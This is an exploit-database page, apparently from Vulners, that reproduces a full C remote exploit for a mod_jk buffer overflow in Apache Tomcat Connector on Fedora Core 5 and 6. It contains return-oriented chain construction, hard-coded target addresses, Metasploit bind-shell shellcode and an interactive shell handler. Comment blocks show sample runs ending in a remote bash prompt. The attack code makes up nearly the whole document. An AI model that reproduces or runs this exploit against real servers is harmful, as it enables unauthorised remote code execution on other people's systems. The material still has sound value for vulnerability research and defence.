Vulners
Lucene search
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
=============================================================
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
=============================================================
/*
**
** Fedora Core 5,6 (exec-shield) based
** Apache Tomcat Connector (mod_jk) remote overflow exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/22791
** vendor: http://tomcat.apache.org/
**
** eliteboy's exploit (SUSE, Debian, FreeBSD):
** http://www.milw0rm.com/exploits/4093
**
** Nicob <nicob[at]nicob.net>'s exploit (Win32):
** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.inetcop.org
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif
#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_2 0x82828282
#define MAP_URI_TO_WORKER_3 0x08048014
/* parody */
#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n"
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define RET_ADDR_INC (0x2000)
#define SH_PORT 8282
char library_shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15"
"\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c"
"\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c"
"\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26"
"\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17"
"\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff";
struct {
int num;
char *type;
int ret_count;
u_long retaddr;
u_long strcpy_plt;
int offset;
u_long pop_pop_pop_ret_code;
u_long pop_pop_ret_code;
u_long ret_code;
u_long worker_arg1;
} targets[] = {
{0,"Fedora Core release 5 (Bordeaux) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5},
{1,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19\n"
"\ttarball install: /usr/local/apache\n"
"\tbinary install: mod_jk-apache-2.0.49-linux-i686.so",
27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6},
{2,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6},
{3,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6},
}, victim;
void re_connt(int sock);
void conn_shell(int sock,char *cmdz);
void usage(char *argv0);
void banrl();
int main(int argc,char *argv[]){
int sock;
int i=0,j=0,l=0,b=0;
unsigned char do_ex[8192];
unsigned char ex_buf[8192*2];
unsigned char sm_buf[4];
char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ;
memset(&victim,0,sizeof(victim));
banrl();
while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){
switch(i){
case 'h':
hostp=(char *)strtok(optarg,":");
if((portp=(char *)strtok(NULL,":"))==NULL)
portp="80";
break;
case 't':
if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){
usage(argv[0]);
return -1;
}
memcpy(&victim,&targets[atoi(optarg)],sizeof(victim));
break;
case 'c':
victim.ret_count=atoi(optarg);
break;
case 'r':
victim.retaddr=strtoul(optarg,NULL,16);
break;
case 's':
victim.strcpy_plt=strtoul(optarg,NULL,16);
break;
case 'p':
victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16);
break;
case 'o':
victim.offset=atoi(optarg);
break;
case 'm':
victim.worker_arg1=strtoul(optarg,NULL,16);
break;
case 'C':
cmdz=optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){
usage(argv[0]);
return -1;
}
victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1;
victim.ret_code=victim.pop_pop_pop_ret_code+3;
printf("[*] os: %s\n\n",victim.type);
printf("[*] host: %s\n",hostp);
printf("[*] port: %s\n",portp);
printf("[*] count: %d\n",victim.ret_count);
printf("[*] [email protected]: %p\n",victim.strcpy_plt);
printf("[*] offset: %d\n",victim.offset);
printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code);
printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code);
printf("[*] ret_code: %p\n",victim.ret_code);
printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1);
printf("[*] start retaddr: %p\n\n",victim.retaddr);
putchar(';');
srand(getpid());
for(b=0;;victim.retaddr+=RET_ADDR_INC){
putchar((rand()%2)? 'P':'p');
fflush(stdout);
usleep(100000);
memset((char *)do_ex,0,sizeof(do_ex));
memset((char *)ex_buf,0,sizeof(ex_buf));
memset((char *)sm_buf,0,sizeof(sm_buf));
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
for(i=0;i<victim.offset-1;i++){
sprintf(do_ex+i,"%c",PADDING_1);
}
__GOGOSSING(do_ex,i,victim.pop_pop_pop_ret_code);
__GOGOSSING(do_ex,i,victim.worker_arg1); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_2); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_3); /* pop */
for(j=0;j<victim.ret_count;j++){
__GOGOSSING(do_ex,i,victim.ret_code);
}
__GOGOSSING(do_ex,i,victim.strcpy_plt); /* ret */
__GOGOSSING(do_ex,i,victim.ret_code);
__GOGOSSING(do_ex,i,victim.retaddr); /* library */
sprintf(ex_buf,"GET /");
l=strlen(ex_buf);
for(j=0;j<i;j++){
if((do_ex[j]>0x08)&&(do_ex[j]<0x0e)){
memset((char *)sm_buf,0,sizeof(sm_buf));
sprintf(sm_buf,"%02x",do_ex[j]);
ex_buf[l++]='%';
ex_buf[l++]=sm_buf[0];
ex_buf[l++]=sm_buf[1];
}
else ex_buf[l++]=do_ex[j];
}
l=strlen(ex_buf);
sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM);
sock=setsock(hostp,atoi(portp));
re_connt(sock);
send(sock,ex_buf,strlen(ex_buf),0);
close(sock);
sock=setsock(hostp,SH_PORT);
if(sock!=-1){
printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, [email protected]=%p,\n"
"pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr,
victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1);
conn_shell(sock,cmdz);
exit(-1);
}
}
}
int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;
if((he=gethostbyname(host))==NULL)
{
return -1;
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
return -1;
}
x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
return -1;
}
return(sock);
}
void re_connt(int sock)
{
if(sock==-1)
{
printf("\n[-] ");
fflush(stdout);
perror("connect()");
printf("[-] exploit failed.\n");
exit(-1);
}
}
void conn_shell(int sock,char *cmdz)
{
int pckt;
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);
send(sock,cmdz,strlen(cmdz),0);
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}
void usage(char *argv0){
int i;
printf("Usage: %s <-switches> -h host[:80]\n",argv0);
printf(" -h host[:port]\tHost\n");
printf(" -t number\t\tTarget id.\n");
printf(" -c ret_count\t\tret count\n");
printf(" -r retaddr\t\tstart library retaddr\n");
printf(" -s [email protected]\t\tstrcpy plt address\n");
printf(" -p pop3/ret\t\tpop3/ret address\n");
printf(" -o offset\t\tOffset\n");
printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n");
printf(" -C cmdz\t\tCommands\n");
printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0);
printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
printf(" ID / Return addr / Target specification\n");
for(i=0;i<sizeof(targets)/sizeof(victim);i++)
printf("% 3d / 0x%08x /\n\t%s\n\n",i,targets[i].retaddr,targets[i].type);
exit(-1);
}
void banrl(){
printf("INetCop(c) Security\t\t\t\t\t%s\n\n",HOST_PARAM);
}
/*
**
** Fedora core 5 exploit:
** --
** $ ./0x82-apache-mod_jk -t 0 -h fc5.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** [*] os: Fedora Core release 5 (Bordeaux) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** [*] host: fc5.inetcop.org
** [*] port: 80
** [*] count: 3
** [*] [email protected]: 0x8060c80
** [*] offset: 4112
** [*] pop_pop_pop_ret_code: 0x8060dc4
** [*] pop_pop_ret_code: 0x8060dc5
** [*] ret_code: 0x8060dc7
** [*] map_uri_to_worker() arg1: 0x80474bc
** [*] start retaddr: 0x100104
**
** ;PPPpppPpppPpppPPpPpPPPppPppPPppPPpPPpPPPPPP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x154104, [email protected]=0x8060c80,
** pop3/ret=0x8060dc4, worker_arg1=0x80474bc
**
** Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
** Fedora core 6 exploit:
** --
** $ ./0x82-apache-mod_jk -t 3 -h fc6.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** [*] os: Fedora Core release 6 (Zod) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** [*] host: fc6.inetcop.org
** [*] port: 80
** [*] count: 3
** [*] [email protected]: 0x8060164
** [*] offset: 4112
** [*] pop_pop_pop_ret_code: 0x80614d4
** [*] pop_pop_ret_code: 0x80614d5
** [*] ret_code: 0x80614d7
** [*] map_uri_to_worker() arg1: 0x80476a4
** [*] start retaddr: 0x100104
**
** ;pPpPppppPpppPppPPPpPPpPppPpPpPPpPPPPPpP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x14c104, [email protected]=0x8060164,
** pop3/ret=0x80614d4, worker_arg1=0x80476a4
**
** Linux localhost 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
*/
/* eox */
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1